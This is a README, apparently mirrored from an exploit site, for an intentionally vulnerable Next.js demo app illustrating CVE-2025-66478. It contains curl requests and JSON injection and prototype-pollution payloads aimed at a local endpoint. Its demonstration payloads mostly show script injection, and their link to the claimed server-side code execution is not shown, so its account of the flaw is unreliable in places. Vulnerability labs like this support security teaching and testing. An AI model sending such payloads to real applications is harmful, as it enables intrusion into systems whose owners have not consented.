Share
## https://sploitus.com/exploit?id=EDADB5A6-BA7B-51D1-99F5-DB39E74E5B6B
# CVE-2025-66478 Vulnerability Demo
This repository contains a deliberately vulnerable Next.js 15.0.0 application demonstrating **CVE-2025-66478**, a critical security vulnerability in React Server Components (RSC) protocol.
## โ ๏ธ WARNING
**This application is intentionally vulnerable and should ONLY be used for:**
- Educational purposes
- Security research
- Vulnerability testing in isolated environments
- Understanding CVE-2025-66478 impact
**NEVER deploy this to production environments!**
## ๐ Vulnerability Details
### CVE-2025-66478
- **Severity:** Critical (CVSS 10.0)
- **Impact:** Remote Code Execution
- **Affected Versions:** Next.js 15.0.0 - 15.0.4, Next.js 16.0.0 - 16.0.6
- **Fixed Versions:** Next.js 15.0.5+, Next.js 16.0.7+
### Root Cause
The React Server Components protocol in vulnerable Next.js versions allows untrusted input to influence server-side execution behavior. Attackers can craft malicious RSC payloads that trigger unintended server execution paths, leading to remote code execution.
## ๐ Quick Start
1. **Install dependencies:**
```bash
npm install
```
2. **Run the vulnerable application:**
```bash
npm run dev
```
3. **Access the demo:**
Open http://localhost:3000 in your browser
## ๐ฏ Testing the Vulnerability
### Method 1: Web Interface
1. Navigate to the main page
2. Use the "Vulnerable RSC Processor" form
3. Try the exploit payloads from the "Exploit Testing Ground"
### Method 2: Direct API Testing
```bash
# Basic payload test
curl -X POST http://localhost:3000/api/process-rsc \
-H "Content-Type: application/json" \
-d '{"data":"{\"component\":\"div\",\"props\":{\"dangerouslySetInnerHTML\":{\"__html\":\"alert(1)\"}}" }'
# Advanced payload test
curl -X POST http://localhost:3000/api/process-rsc \
-H "Content-Type: application/json" \
-d '{"data":"{\"component\":\"__proto__\",\"props\":{\"constructor\":{\"prototype\":{\"dangerouslySetInnerHTML\":{\"__html\":\"console.log(\\"RCE via RSC\\")\"}}}}"}'
```
## ๐ญ Exploit Payloads
### 1. Basic Script Injection
```json
{
"component": "div",
"props": {
"dangerouslySetInnerHTML": {
"__html": "alert('XSS via RSC')"
}
}
}
```
### 2. Component Prototype Pollution
```json
{
"component": "__proto__",
"props": {
"constructor": {
"prototype": {
"dangerouslySetInnerHTML": {
"__html": "console.log('Prototype Pollution')"
}
}
}
}
}
```
### 3. RSC Deserialization Attack
```json
{
"component": "div",
"props": {
"data-__rsc": "malicious_payload",
"children": [
{
"$$typeof": "Symbol.for('react.element')",
"type": "script",
"props": {
"dangerouslySetInnerHTML": {
"__html": "console.log('RCE via RSC');"
}
}
}
]
}
}
```
## ๐ Expected Results
### โ
Successful Exploit (Vulnerable Version)
- **Browser:** JavaScript alerts execute, console logs appear
- **Server:** Payload processed without validation
- **Network:** 200 OK response with processed data
- **Impact:** Remote code execution possible
### โ Failed Exploit (Patched Version)
- **Browser:** No script execution, error messages
- **Server:** Input rejected or sanitized
- **Network:** 400/500 error responses
- **Impact:** Vulnerability mitigated
## ๐ง Mitigation
### Immediate Fix
Upgrade to patched versions:
```bash
# For Next.js 15.x
npm install next@15.0.5
# For Next.js 16.x
npm install next@16.0.7
```
### Alternative Solutions
1. **Downgrade to stable 14.x:** `npm install next@14`
2. **Use Pages Router:** Not affected by this vulnerability
3. **Use Edge Runtime:** Not affected by this vulnerability
## ๐ก๏ธ Detection
Check if your application is vulnerable:
```bash
# Check Next.js version
npm list next
# Automated fix tool
npx fix-react2shell-next
```
## ๐ References
- [Next.js Security Advisory](https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp)
- [React Security Advisory](https://vulners.com/cve/CVE-2025-55182)
- [Next.js Blog Post](https://nextjs.org/blog/CVE-2025-66478)
- [React Blog Post](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
## ๐๏ธ Project Structure
```
cve-2025-66478-demo/
โโโ app/
โ โโโ api/
โ โ โโโ process-rsc/
โ โ โโโ route.ts # Vulnerable API endpoint
โ โโโ globals.css
โ โโโ layout.tsx # Root layout
โ โโโ page.tsx # Main page
โโโ components/
โ โโโ VulnerableComponent.tsx # Vulnerable RSC processor
โ โโโ ExploitDemo.tsx # Exploit testing interface
โโโ package.json # Dependencies (Next.js 15.0.0)
โโโ next.config.js # Next.js configuration
โโโ tsconfig.json # TypeScript configuration
โโโ README.md # This file
```
## ๐ License
This project is for educational purposes only. Use responsibly and in accordance with applicable laws and regulations.
## โ๏ธ Disclaimer
This repository is created for security research and educational purposes. The author is not responsible for any misuse of this code or any damage caused by its use. Users are responsible for using this code ethically and legally.